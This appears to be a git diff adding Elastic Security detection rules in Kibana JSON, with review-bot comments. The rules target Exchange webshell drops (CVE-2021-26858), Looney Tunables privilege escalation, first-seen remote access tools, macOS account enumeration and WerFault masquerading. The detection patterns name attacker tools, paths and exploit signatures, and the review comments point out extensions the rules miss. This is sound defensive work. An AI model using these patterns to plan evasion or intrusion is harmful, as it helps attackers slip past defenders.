b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_108.json 
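Review bot: The `file.extension` list in `query` (`php`, `jsp`, `js`, `aspx`, `asmx`, `asax`, `cfm`, `shtml`) leaves out other server-executed IIS extensions such as `asp`, `ashx` and `ascx`, so a file dropped under the monitored `aspnet_client`, `owa\auth` or `ecp\auth` paths with one of those extensions is not caught; consider extending the list to `(\"php\", \"jsp\", \"js\", \"asp\", \"aspx\", \"ashx\", \"ascx\", \"asmx\", \"asax\", \"cfm\", \"shtml\")`. The `_108` hunk that follows carries the identical query and only narrows `index` to `logs-endpoint.events.file-*`, so the same applies there. Separately, the guidance that the rule "should only be enabled after the fact" sits in `false_positives`, whereas an operator enabling the rule reads `setup`; repeating that sentence at the top of `setup` would put it where it is acted on.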
@@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies suspicious files being written by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26858.", + "false_positives": [ + "Files generated during installation will generate a lot of noise, so the rule should only be enabled after the fact.", + "This rule was tuned using the following baseline: https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/Baselines/baseline_15.2.792.5.csv from Microsoft. Depending on version, consult https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines to help determine normalcy." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Exchange Server UM Writing Suspicious Files", + "note": "## Triage and analysis\n\nPositive hits can be checked against the established Microsoft [baselines](https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines).\n\nMicrosoft highly recommends that the best course of action is patching, but this may not protect already compromised systems\nfrom existing intrusions. 
Other tools for detecting and mitigating can be found within their Exchange support\n[repository](https://github.com/microsoft/CSS-Exchange/tree/main/Security)\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : (\"UMWorkerProcess.exe\", \"umservice.exe\") and\n file.extension : (\"php\", \"jsp\", \"js\", \"aspx\", \"asmx\", \"asax\", \"cfm\", \"shtml\") and\n (\n file.path : \"?:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\" or\n\n (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\*\" and\n not (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\version\\\\*\" or\n file.name : (\"errorFE.aspx\", \"expiredpassword.aspx\", \"frowny.aspx\", \"GetIdToken.htm\", \"logoff.aspx\",\n \"logon.aspx\", \"OutlookCN.aspx\", \"RedirSuiteServiceProxy.aspx\", \"signout.aspx\"))) or\n\n (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\ecp\\\\auth\\\\*\" and\n not file.name : \"TimeoutLogoff.aspx\")\n )\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63", + "setup": "## Setup\n\nIf 
enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "6cd1779c-560f-4b68-a8f1-11009b27fe63_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_4.json b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_4.json new file mode 100644 index 00000000000..d7186beba9d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_4.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects potential privilege escalation attempts through Looney Tunables (CVE-2023-4911). Looney Tunables is a buffer overflow vulnerability in GNU C Library's dynamic loader's processing of the GLIBC_TUNABLES environment variable.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via CVE-2023-4911", + "query": "sequence by host.id, process.parent.entity_id, process.executable with maxspan=5s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.env_vars : \"*GLIBC_TUNABLES=glibc.*=glibc.*=*\"] with runs=5\n", + "references": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.env_vars", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "6d8685a1-94fa-4ef7-83de-59302e7c4ca8", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nElastic Defend integration does not collect environment variable logging by default.\nIn order to capture this behavior, this rule requires a specific configuration option set within the advanced settings of the Elastic Defend integration.\n #### To set up environment variable capture for an Elastic Agent policy:\n- Go to \u201cSecurity \u2192 Manage \u2192 Policies\u201d.\n- Select an \u201cElastic Agent policy\u201d.\n- Click \u201cShow advanced settings\u201d.\n- Scroll down or search for \u201clinux.advanced.capture_env_vars\u201d.\n- Enter the names of environment variables you want to capture, separated by commas.\n- For this rule the linux.advanced.capture_env_vars variable should be set to \"GLIBC_TUNABLES\".\n- Click \u201cSave\u201d.\nAfter saving the integration change, the Elastic Agents running this policy will be updated and the rule will function properly.\nFor more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": 
"https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 4 + }, + "id": "6d8685a1-94fa-4ef7-83de-59302e7c4ca8_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_5.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_5.json new file mode 100644 index 00000000000..5d05aac68c6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_5.json 
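Review bot: The rule attributes omit `timestamp_override`, so with `"from": "now-9m"` events that are indexed late (agent offline, ingest backlog) can fall outside the lookback window and never be evaluated; the sibling rules in this patch (6cd1779c…_108, 6e1a2cc4…_5, 6e9b351e…_107) set `"timestamp_override": "event.ingested"`, and 6ea41894…_107 has the same omission. Consider adding `"timestamp_override": "event.ingested",` after the `"threat"` array, as the other rules do. The setup text links a version-pinned guide (`fleet/8.10/agent-policy.html`) where the neighbouring rules link `fleet/current/`; if the pin is unintentional it will go stale. The sequence keyed on `host.id`, `process.parent.entity_id` and `process.executable` with `runs=5` and `maxspan=5s` only fires once five starts of the same executable with a matching `GLIBC_TUNABLES` value occur within 5s, which is worth stating in the description so anyone tuning the threshold knows what it trades off.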
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may install legitimate remote access tools (RAT) to compromised endpoints for further command-and-control (C2). Adversaries can rely on installed RATs for persistence, execution of native commands and more. This rule detects when a process is started whose name or code signature resembles commonly abused RATs. This is a New Terms rule type indicating the host has not seen this RAT process started before within the last 30 days.", + "from": "now-9m", + "history_window_start": "now-15d", + "index": [ + "logs-endpoint.events.process-*", + "endgame-*", + "winlogbeat-*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen Commonly Abused Remote Access Tool Execution", + "new_terms_fields": [ + "host.id" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Seen Commonly Abused Remote Access Tool Execution\n\nRemote access software is a class of tools commonly used by IT departments to provide support by connecting securely to users' computers. Remote access is an ever-growing market where new companies constantly offer new ways of quickly accessing remote systems.\n\nAt the same pace as IT departments adopt these tools, the attackers also adopt them as part of their workflow to connect into an interactive session, maintain access with legitimate software as a persistence mechanism, drop malicious software, etc.\n\nThis rule detects when a remote access tool is seen in the environment for the first time in the last 15 days, enabling analysts to investigate and enforce the correct usage of such tools.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check if the execution of the remote access tool is approved by the organization's IT department.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n - If the tool is not approved for use in the organization, the employee could have been tricked into installing it and providing access to a malicious third party. Investigate whether this third party could be attempting to scam the end-user or gain access to the environment through social engineering.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- If an authorized support person or administrator used the tool to conduct legitimate support or remote access, consider reinforcing that only tooling approved by the IT policy should be used. The analyst can dismiss the alert if no other suspicious behavior is observed involving the host or users.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If an unauthorized third party did the access via social engineering, consider improvements to the security awareness program.\n- Enforce that only tooling approved by the IT policy should be used for remote access purposes and only by authorized staff.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type: \"windows\" and\n\n event.category: \"process\" and event.type : \"start\" and\n\n (\n process.code_signature.subject_name : (\n \"Action1 Corporation\" or\n \"AeroAdmin LLC\" or\n \"Ammyy LLC\" or\n \"Atera Networks Ltd\" or\n \"AWERAY PTE. LTD.\" or\n \"BeamYourScreen GmbH\" or\n \"Bomgar Corporation\" or\n \"DUC FABULOUS CO.,LTD\" or\n \"DOMOTZ INC.\" or\n \"DWSNET O\u00dc\" or\n \"FleetDeck Inc\" or\n \"GlavSoft LLC\" or\n \"GlavSoft LLC.\" or\n \"Hefei Pingbo Network Technology Co. 
Ltd\" or\n \"IDrive, Inc.\" or\n \"IMPERO SOLUTIONS LIMITED\" or\n \"Instant Housecall\" or\n \"ISL Online Ltd.\" or\n \"LogMeIn, Inc.\" or\n \"Monitoring Client\" or\n \"MMSOFT Design Ltd.\" or\n \"Nanosystems S.r.l.\" or\n \"NetSupport Ltd\" or\n \"NinjaRMM, LLC\" or\n \"Parallels International GmbH\" or\n \"philandro Software GmbH\" or\n \"Pro Softnet Corporation\" or\n \"RealVNC\" or\n \"RealVNC Limited\" or\n \"BreakingSecurity.net\" or\n \"Remote Utilities LLC\" or\n \"Rocket Software, Inc.\" or\n \"SAFIB\" or\n \"Servably, Inc.\" or\n \"ShowMyPC INC\" or\n \"Splashtop Inc.\" or\n \"Superops Inc.\" or\n \"TeamViewer\" or\n \"TeamViewer GmbH\" or\n \"TeamViewer Germany GmbH\" or\n \"Techinline Limited\" or\n \"uvnc bvba\" or\n \"Yakhnovets Denis Aleksandrovich IP\" or\n \"Zhou Huabing\"\n ) or\n\n process.name.caseless : (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n 
\"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"teamviewer.exe\" or\n \"TiClientCore.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n \"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\"\n ) or\n process.name : (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n \"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"teamviewer.exe\" or\n \"TiClientCore.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n 
\"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\"\n )\n\t) and\n\n\tnot (process.pe.original_file_name : (\"G2M.exe\" or \"Updater.exe\" or \"powershell.exe\") and process.code_signature.subject_name : \"LogMeIn, Inc.\")\n", + "references": [ + "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", + "https://attack.mitre.org/techniques/T1219/", + "https://github.com/redcanaryco/surveyor/blob/master/definitions/remote-admin.json" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6e1a2cc4-d260-11ed-8829-f661ea17fbcc", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Software", + "reference": "https://attack.mitre.org/techniques/T1219/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 5 + }, + 
"id": "6e1a2cc4-d260-11ed-8829-f661ea17fbcc_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_107.json b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_107.json new file mode 100644 index 00000000000..091fcbb64b3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_107.json 
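Review bot: The description says the host has not seen the RAT process "within the last 30 days", but `"history_window_start": "now-15d"` and the triage note ("first time in the last 15 days") both say 15 days; one of the three should change so analysts do not misjudge the baseline, e.g. `...has not seen this RAT process started before within the last 15 days.` The process-name list is duplicated verbatim under `process.name.caseless` and `process.name` (the former declared `"ecs": false, "type": "unknown"`), so every future addition must be made twice; documenting why both forms are needed (presumably data sources that lack the `.caseless` multi-field) would help whoever maintains the list. `"NinjaRMMAgenPatcher.exe"` looks like it may be missing a `t` (`NinjaRMMAgentPatcher.exe`) — worth verifying against the vendor's binary name, since an exact name match silently misses on a typo.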
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of macOS built-in commands related to account or group enumeration. Adversaries may use account and group information to orient themselves before deciding how to act.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumeration of Users or Groups via Built-in Commands", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n (\n process.name : (\"ldapsearch\", \"dsmemberutil\") or\n (process.name : \"dscl\" and\n process.args : (\"read\", \"-read\", \"list\", \"-list\", \"ls\", \"search\", \"-search\") and\n process.args : (\"/Active Directory/*\", \"/Users*\", \"/Groups*\"))\n\t) and\n not process.parent.executable : (\"/Applications/NoMAD.app/Contents/MacOS/NoMAD\",\n \"/Applications/ZoomPresence.app/Contents/MacOS/ZoomPresence\",\n \"/Applications/Sourcetree.app/Contents/MacOS/Sourcetree\",\n \"/Library/Application Support/JAMF/Jamf.app/Contents/MacOS/JamfDaemon.app/Contents/MacOS/JamfDaemon\",\n \"/Applications/Jamf Connect.app/Contents/MacOS/Jamf Connect\",\n \"/usr/local/jamf/bin/jamf\",\n \"/Library/Application Support/AirWatch/hubd\",\n \"/opt/jc/bin/jumpcloud-agent\",\n \"/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon\",\n \"/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon\",\n \"/Library/PrivilegedHelperTools/com.fortinet.forticlient.uninstall_helper\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_107.json b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_107.json new file mode 100644 index 00000000000..679d78174ab --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_107.json 
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious instances of the Windows Error Reporting process (WerFault.exe or Wermgr.exe) with matching command-line and process executable values performing outgoing network connections. This may be indicative of a masquerading attempt to evade suspicious child process behavior detections.", + "false_positives": [ + "Legit Application Crash with rare Werfault commandline value" + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Windows Error Manager Masquerading", + "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous 